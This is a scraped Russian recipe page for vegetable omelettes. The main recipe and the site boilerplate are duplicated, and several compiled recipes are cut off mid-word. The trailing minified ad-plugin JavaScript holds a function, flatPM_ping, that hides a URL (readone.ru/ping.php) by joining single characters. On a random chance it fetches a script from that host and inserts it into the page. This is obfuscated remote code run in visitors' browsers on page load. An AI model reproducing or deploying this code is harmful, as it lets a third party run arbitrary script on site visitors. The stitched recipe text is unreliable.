Овощной омлет

Омлет с овощами

Может показаться рецепт банальным на первый взгляд. Но мне понравился именно этот вариант: в одном блюде сочетаются хорошо прожаренная картошка, нежный омлет и практически сырой черешковый сельдерей. На Поваренке такого варианта нет, да и на других сайтах не видела.

Ингредиенты для «Омлет с овощами»:

  • Яйцо куриное — 1 шт
  • Простокваша (я беру термостатную) — 30 г
  • Картофель (половинка небольшой картофелины) — 30 г
  • Сельдерей черешковый — 20 г
  • Соевый соус — 5 мл

Количество порций: 1

Рецепт «Омлет с овощами»:

Картофель и сельдерей очистить и нарезать. Картофель пожарить на растительном масле (или без жира на антипригарной сковороде) до готовности.

Яйцо слегка взбить вилкой с термостатной простоквашей и соевым соусом.

Добавить нарезанный сельдерей и вылить эту смесь в сковороду с картошкой. Довести омлет до готовности (я это делаю под крышкой, на слабом огне).

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Испанская тортилья

  • 3
  • 50
  • 3573

Омлет по-семейному

  • 10
  • 155
  • 2853

Разноцветный омлет с фасолью и грибами

  • 46
  • 77
  • 1946

Рулетики “Челси”

  • 47
  • 65
  • 3979

Идеальный омлет за 5 минут

  • 213
  • 1550
  • 131350

Завтрак “Я его слепила. ”

  • 80
  • 233
  • 35705

Яичный коблер с кабачком

  • 54
  • 251
  • 4030

Классический французский омлет с начинкой

  • 24
  • 81
  • 3439

Завтрак из перепелиных яиц

  • 20
  • 40
  • 2189

Попробуйте приготовить вместе

Закуска “Битые огурцы”

  • 53
  • 1050
  • 76646

Канапе “Канапули”

  • 347
  • 4186
  • 808557

Торт “Кроха”

  • 91
  • 491
  • 27293

Комментарии и отзывы

22 мая 2019 года laka-2014 #

22 мая 2019 года elenita # (автор рецепта) (модератор)

22 мая 2019 года laka-2014 #

21 мая 2019 года tomi_tn #

21 мая 2019 года elenita # (автор рецепта) (модератор)

21 мая 2019 года wise1288 #

21 мая 2019 года elenita # (автор рецепта) (модератор)

20 мая 2019 года Ирушенька #

20 мая 2019 года elenita # (автор рецепта) (модератор)

20 мая 2019 года Демурия #

20 мая 2019 года elenita # (автор рецепта) (модератор)

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Полезный завтрак рецепты как приготовить овощной завтрак с яйцом и сыром

Выбирая вариант завтрака, учтите все нюансы наступающего дня. Если вы сможете чем-то перекусить через час или два, можете выбрать салат или творог. Но если вам предстоит долгий рабочий день, лучше остановить свой выбор на омлете. Рецепт омлета с овощами немного сложнее, чем простой омлет, зато это блюдо полезнее и сытнее.

Овощной омлет в духовке с фото

Омлет с овощами тушеные в духовке получается пышным, вкусным и полезным.

Вам понадобятся:

  • молоко — полстакана;
  • яйца — 2 штуки;
  • морковь — 1 штука;
  • болгарский перец — 1 штука;
  • брокколи — 200 г;
  • лук-порей — полстебля;
  • кабачок — 200 г;
  • сыр — 100 г;
  • соль, перец.
  1. Нарежьте овощи и обжарьте их в масле 5-7 минут.
  2. Последней добавьте капусту, долейте немного воды и потушите 7 минут.
  3. Выложите готовые овощи в форму для запекания.
  4. Яйца посолите, добавьте молоко, взбейте и вылейте на овощи.
  5. Запекайте омлет 15 минут при температуре 190 градусов.
  6. Сыр натрите на терке, за 3 минуты до готовности, посыпьте им омлет.

Рецепты запеченные на сковороде

С фасолью, болгарским перцем и сыром

  • фасоль стручковая — 50 г;
  • болгарский перец — 100 г;
  • яйца — 3 штуки;
  • сыр пармезан — 50 г;
  • масло сливочное — 20 г;
  • перец, соль.

Приготовление

  1. Небольшими кусочками нарежьте овощи и обжарьте.
  2. Яйца взбейте, посолите и поперчите.
  3. Вылейте яйца в сковороду и жарьте на среднем огне 7 минут.
  4. Посыпьте тертым сыром и оставьте еще на 2 минуты на огне.

С луком-пореем и шпинатом

Вам понадобятся:

  • яйца — 4 штуки;
  • шпинат — 100 г;
  • лук-порей — 150 г;
  • масло кунжутное — 100 г;
  • соль.
  1. Лук и шпинат нарежьте соломкой.
  2. Яйца взбейте, посолите.
  3. Добавьте подготовленные овощи и перемешайте.
  4. Налейте масло на сковороду и вылейте омлет.
  5. Обжарьте с двух сторон.

С замороженными овощами

Если вы торопитесь, приготовьте омлет с замороженными овощами. Можно выбрать какой-то один овощ или смесь.

Вам понадобятся:

  • яйца — 3 штуки;
  • молоко — полстакана;
  • замороженные овощи — 1 пакет;
  • соль, зелень.
  1. Овощи обжарьте в течение 5 минут, затем потушите еще 7 минут.
  2. Яйца посолите, добавьте молоко и хорошо взбейте.
  3. Мелко нарежьте зелень, смешайте с яичной смесью.
  4. Вылейте смесь в сковороду.
  5. Готовьте 6-8 минут.

Готовим в микроволновке

Можно ли приготовить омлет с молоком без корочки? Если вы хотите сделать блюдо быстро, но без корочки, приготовьте его в микроволновке.

Вам понадобятся:

  • яйца — 3 штуки;
  • молоко — полстакана;
  • шпинат — 100 г;
  • перец болгарский — 1 штука;
  • зеленый горошек — 50 г;
  • соль.
  1. Миксером взбейте яйца с молоком, посолите.
  2. Измельчите перец и шпинат.
  3. Смешайте все овощи с яичной смесью и вылейте в формочку.
  4. Поставьте в микроволновку на 7-10 минут.

Омлет в мультиварке

Если вы заботитесь о своем здоровье и фигуре, приготовьте омлет с овощами в мультиварке без добавления масла.

Вам понадобятся:

  • яйца — 2 штуки;
  • капуста цветная — 100 г;
  • брюссельская капуста — 100 г;
  • морковь — 100 г;
  • зеленый горошек — 50 г;
  • молоко — 200 мл;
  • соль, сода, укроп.
  1. Натрите на терке морковь.
  2. Разберите капусту на соцветия.
  3. Обжарьте овощи, готовьте в мультиварке в режиме «Тушение» 7 минут.
  4. Яйца взбейте с молоком и солью. Добавьте соду на кончике ножа и еще раз взбейте.
  5. Мелко нарежьте укроп и добавьте в смесь.
  6. Залейте все яичной смесью.
  7. Через 10 минут в режиме «Тушение» омлет будет готов.

Теперь вы знаете, как приготовить омлет с овощами на сковороде, в духовке, мультиварке и микроволновке. Выбирайте понравившийся рецепт и готовьте вкусно для себя и близких!

Рецепты Овощной омлет

Овощной “омлет” без яиц

Мука пшеничная – 4 ст. л.

Масло растительное – 3 ст. л.

Кабачок, если молодой, можно не очищать от шкурки, нарезать кубиками, положить на сковороду с разогретым маслом. Потушить под крышкой минуты 2-3.

К кабачкам добавить нарезанный тоже кубиками помидор. Солим. Под крышкой потушить еще минут 10.

В это ремя делаем кляр из воды и муки. Муку размешиваем вилкой, добавяем немного соли.

Овощной бульон с белковым омлетом

Картофель – 100 г

Корень петрушки – 20 г

Яичный белок – 1 г

Сливочное масло – 5 г

Овощи нарезать на куски и сварить в слегка подсоленной воде под крышкой, дать настояться в течение часа и процедить.

Яичный белок смешать с молоком, вылить в сковородку, смазанную маслом, и запечь, затем охладить до комнатной температуры и разрезать омлет на 5–6 кусочков.

Запеченный омлет “Овощная нежность”

сметана – 1/2 стакана

форму для запекания смазать маслом

сыр порезать пластиками и выложить на дно формы

разбить три яйца в отдельную посуду, посолить и перемешать

вылить половину яичной массы на сыр

положить мелко порезанные овощи и полить соевым соусом.

Овощной омлет

2 куриных яйца (или 8 перепелиных),

4 столовых ложки йогурта,

пол дольки чеснока,

укроп или базилик.

1 маленький шалот (или столовая ложка мелкопорезанного красного или репчатого),

половина сладкого красного перца (у меня замороженный),

4 помидорки черри или 1 средний помидор(у меня замороженная томатная масса ),

5 столовых ложек зеленого горошка (у меня консервированный),

Чеснок и лук мелко порубить. Очищенные овощи нарезать очень маленькими кубиками (перец без семян). Зелень порубить.

В сковороду налить столовую ложку оливкового масла и на среднем огне слегка обжарить лук и чеснок.

Добавить смесь из овощей и потушить минут пять.

Запеченный овощной омлет

Соль – 1 чайная ложка

Лук-шалот – 2 головки

Сливочное масло – 1 столовая ложка

Чеснок – 2 зубчика

Молотый красный перец – щепотка

Перец черный молотый – по вкусу

Желтый сладкий перец – 1 штука

Оливковое масло – 1 столовая ложка

Тертый сыр пармезан – 2 столовые ложки

Яйцо куриное – 6 штук

Кабачки – 1 штука

Духовку нагрейте до 230 градусов. Нарежьте цукини, перцы и лук. Выложите на форму для запекания и сбрызните маслом, посыпьте солью и перцем. Перемешайте и выпекайте около 10 минут. Достаньте и добавьте нарезанный чеснок и снова перемешайте. Отправьте обратно еще на 10 минут.

В это время, в миске вбейте яйца, добавьте молоко, сыр и 0,5 чайной ложки соли. Взбей.

Омлет с картофелем и овощной сальсой

Зелень – по вкусу

Яйцо куриное – 2 шт

Картофель – 1 шт

Специи – по вкусу

Перец болгарский – 1 шт

Сыр твердый – 70 г

Ингредиенты для нашего завтрака

Картофель нарезаем очень тонко, прозрачными ломтиками. Поскольку картофель – это единственный продукт, который может пристать ко дну кастрюли Zepter, на дно холодной кастрюли капаем буквально 2 капли оливкового масла и смазываем всю поверхность. Сверху укладываем картофель.

Яйца в отдельной посуде взбалтываем вилочкой (я еще люб.

Овощной бульон с омлетом, овощами и имбирем

Сельдерей – 1 штука

Сливочное масло – 1 столовая ложка

Рис для суши – 300 г

Сахарный горох – 250 г

Грибы шиитаке – 12 штук

Саке – 5 столовых ложек

Мирин – 2 столовые ложки

Зелень – 1 пучок

Лук репчатый – 2 головки

Морковь – 2 штуки

Соевый соус – 6 столовых ложек

Сахар – 2 столовые ложки

Яйцо куриное – 4 штуки

Залить грибы шиитаке кипящей водой и оставить на 20 минут. Затем тщательно промыть и удалить ножки.

Смешать воду с соевым соусом и мирином, добавить соль и сахар и довести до кипения. Опустить в бульон грибы.

Нашинковать морковь, сельдерей и лук, обжарить на сливочном масле и добавить к грибам. Варить 10 минут.

Промыть сахарный горох и отварить в подсоленной в.

Овощной омлет диетический

Фета – 25-35 Грамм (по желанию)

Помидор черри – 2-3 Штук

Перец – 1 Щепотка

Сладкий перец – 0.5 Штуки

Соль – 1 Щепотка

Луковица фиолетовая – 0.5 Штуки

Яйцо – 5 Штук (2 яйца и 3 белка)

1. Рецепт приготовления овощного омлета диетического довольно прост. Для начала необходимо подготовить все овощи. В данном варианте – это фиолетовая луковица, сладкий перец, небольшой помидор и шпинат. Также при желании можно добавить сыр Фета.

2. Овощи необходимо нарезать мелкими кубиками. Шпинат вымыть, просушить и немного измельчить. Разделить всю начинку .

Маленький овощной омлет

веточка розмарина – 1 Штука

соль, перец – – По вкусу

копченая ветчина – 1 Ломтик

оливковое масло – 9 Ст. ложек

чеснок – 1 Зубчик

помидор – 1 Штука

цуккини – 1 Штука

веточка эстрагона – 1 Штука

Лавровый лист – 1 Штука

Нарезать мелкими кубиками кабачок и помидор.

В сковороду на среднем огне налить 3 столовые ложки оливкового масла и, когда нагреется добавить зубчик чеснока, веточки эстрагона, розмарина и лавровый лист. Жарить в течение одной минуты, помешивая.

Добавить нарезанные кубиками кабачки, и хорошо перемешать. Слегка посолить (2 щепотки). Жарить до готовности, но о.

Фритата со свекольной ботвой,брокколи и помидорами черри или Вкусный Овощной омлет

молотый черный перец

помидоры черри-1 горсть

ботва красной свеклы-5 больших листиков

Ботву моем и нарезаем как можно мельче.Брокколи разделяем на маленькие кусочки,помидоры черри моем и оставляем целиком.

Яйца разделяем на белки и желтки.Белки солим и ставим в морозилку на 2-3 мин.

В большой миске смешиваем желтки,горчицу,ряженку,отруби и хорошенько перемешиваем.

Затем добавляем свекольную ботву,брокколи,помидоры,перчим,посыпаем орегано и аккур.

Осенний овощной суп с гречневым омлетом

Крупа гречневая – 2 ст. л.

Яйцо куриное – 2 шт

Лук-порей – 100 г

Для начала варим говяжий бульон. Я варила из мякоти, т. к. мне нужна была отварная говядина. Можно варить на косточках. Также можно использовать куриный бульон. При варке я добавила луковку и морковь, в конце варки бульон необходимо посолить по вкусу

Отварить гречневую крупу до готовности, добавив соль. Я использовала ядрицу гречневую от Мистраль

Овощной рататуй, рулетики из омлета и облепиховый морс

цукини – 1 Штука

облепиха – 300 Грамм (для морса)

соль, перец – По вкусу

мука – 0.5 Ст. ложки (для рулетиков)

лук зелёный – 1 Часть (пучок, для рулетиков)

сосиски длинные – 2 Штуки (для рулетиков)

томаты в собственном соку – 3 Штуки

молоко – 200 Миллилитров (для рулетиков)

мёд – 2 Ст. ложки (для морса)

баклажан – 1 Штука

яйца – 3 Штуки (для рулетиков)

помидор – 2 Штуки

вода – 500 Миллилитров (для морса)

зелень – По вкусу

чеснок – 2 Зубчика

Ставим вариться сосиски, на хорошо разогретой сковороде, обжариваем(на оливковом масле) лук, порезанный на средние кубики

Лук обжариваем 2-3 минуты и добавляем порезанные кубиками баклажаны и мелко порубленный чеснок, обжариваем ещё 1-2 минуты

Добавьте цукини и готовьте 2–3 мин.

Добавьте свежие и консервированные помидоры, так же нарезанные кубиками и немного г.

Омлет с овощами

Может показаться рецепт банальным на первый взгляд. Но мне понравился именно этот вариант: в одном блюде сочетаются хорошо прожаренная картошка, нежный омлет и практически сырой черешковый сельдерей. На Поваренке такого варианта нет, да и на других сайтах не видела.

Ингредиенты для «Омлет с овощами»:

  • Яйцо куриное — 1 шт
  • Простокваша (я беру термостатную) — 30 г
  • Картофель (половинка небольшой картофелины) — 30 г
  • Сельдерей черешковый — 20 г
  • Соевый соус — 5 мл

Количество порций: 1

Рецепт «Омлет с овощами»:

Картофель и сельдерей очистить и нарезать. Картофель пожарить на растительном масле (или без жира на антипригарной сковороде) до готовности.

Яйцо слегка взбить вилкой с термостатной простоквашей и соевым соусом.

Добавить нарезанный сельдерей и вылить эту смесь в сковороду с картошкой. Довести омлет до готовности (я это делаю под крышкой, на слабом огне).

Подписывайтесь на группу Поварёнка в Контакте и получайте десять новых рецептов каждый день!

Вступайте в нашу группу в Одноклассниках и получайте новые рецепты каждый день!

Поделиться рецептом с друзьями:

Нравятся наши рецепты?
BB-код для вставки:
BB-код используется на форумах
HTML-код для вставки:
HTML код используется в блогах, например LiveJournal

Как это будет выглядеть?

Похожие рецепты

Испанская тортилья

  • 3
  • 50
  • 3573

Омлет по-семейному

  • 10
  • 155
  • 2853

Разноцветный омлет с фасолью и грибами

  • 46
  • 77
  • 1946

Рулетики “Челси”

  • 47
  • 65
  • 3979

Идеальный омлет за 5 минут

  • 213
  • 1550
  • 131350

Завтрак “Я его слепила. ”

  • 80
  • 233
  • 35705

Яичный коблер с кабачком

  • 54
  • 251
  • 4030

Классический французский омлет с начинкой

  • 24
  • 81
  • 3439

Завтрак из перепелиных яиц

  • 20
  • 40
  • 2189

Попробуйте приготовить вместе

Закуска “Битые огурцы”

  • 53
  • 1050
  • 76646

Канапе “Канапули”

  • 347
  • 4186
  • 808557

Торт “Кроха”

  • 91
  • 491
  • 27293

Комментарии и отзывы

22 мая 2019 года laka-2014 #

22 мая 2019 года elenita # (автор рецепта) (модератор)

22 мая 2019 года laka-2014 #

21 мая 2019 года tomi_tn #

21 мая 2019 года elenita # (автор рецепта) (модератор)

21 мая 2019 года wise1288 #

21 мая 2019 года elenita # (автор рецепта) (модератор)

20 мая 2019 года Ирушенька #

20 мая 2019 года elenita # (автор рецепта) (модератор)

20 мая 2019 года Демурия #

20 мая 2019 года elenita # (автор рецепта) (модератор)

Оставить комментарий или отзыв о рецепте

Зарегистрироваться, или войти если вы уже регистрировались.

Вы можете войти на сайт без регистрации и ввода пароля, воспользовавшись своей учетной записью на следующих сайтах:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};